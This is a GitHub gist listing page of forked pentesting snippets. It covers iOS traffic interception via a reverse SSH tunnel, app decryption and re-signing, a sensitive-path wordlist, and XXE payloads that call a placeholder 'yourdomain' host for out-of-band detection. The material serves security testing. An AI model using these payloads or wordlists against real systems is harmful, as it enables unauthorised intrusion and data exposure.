Skip to content

Instantly share code, notes, and snippets.

View affilares's full-sized avatar

MrRunt1me affilares

6 followers · 10 following
View GitHub Profile
@affilares
affilares / gist:3f7afd8a2124daea3dc4e9208088e5c5
Created June 30, 2022 18:29 — forked from pich4ya/gist:1ac125726e4f79c6832899e6c9b7bde1
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# @author Pichaya Morimoto ([email protected])
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy
# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone)
# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย
1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh reverse tunnel (-R)
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 [email protected] -N -f
@affilares
affilares / yet another radare2 cheatsheet.md
Created November 23, 2021 12:59 — forked from williballenthin/yet another radare2 cheatsheet.md

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@affilares
affilares / flexdump
Created November 17, 2021 10:37 — forked from defparam/flexdump
Flexdump - A script that wraps flexdecrypt to dump, decrypt, re-sign, re-package iOS apps
#!/bin/bash
# Copyright 2021 Evan Custodio (@defparam)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
@affilares
affilares / Wordlist
Created August 28, 2021 06:52 — forked from Vishnugadupudi/Wordlist
A short wordlist i use :)
actuator
actuator/heapdump
_admin
adminer.sql
admin/heapdump
admin.php
after.sh
aliases
api
api/batch
@affilares
affilares / apk_relative_links.txt
Created August 13, 2021 02:51 — forked from nullenc0de/apk_relative_links.txt
@affilares
affilares / xxe-payloads.txt
Created August 7, 2021 14:49 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@affilares
affilares / api-linkfinder.sh
Created August 7, 2021 14:47 — forked from nullenc0de/api-linkfinder.sh
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@affilares
affilares / apk-recon.yaml
Created August 6, 2021 11:23 — forked from nullenc0de/apk-recon.yaml
id: apk-recon
info:
name: APK Recon
author: nullenc0de
severity: info
tags: android,file
file:
- extensions:
@affilares
affilares / NoFud.json
Created July 25, 2021 13:14 — forked from JesseClarkND/NoFud.json
Burp DNI config file
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"advanced_mode":false,
"drop_all_out_of_scope":false,
"exclude":[],
"include":[],
"scope_option":"suite"
@affilares
affilares / BlindGraphQL.md
Created June 29, 2021 16:21 — forked from me0wday/BlindGraphQL.md
Blind Graphql Discovery to Altair Schema

Playing with GraphQL when introspection is disabled

Quick write up on extracting a GraphQL schema when introspection is disabled. Bits and pieces sourced from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.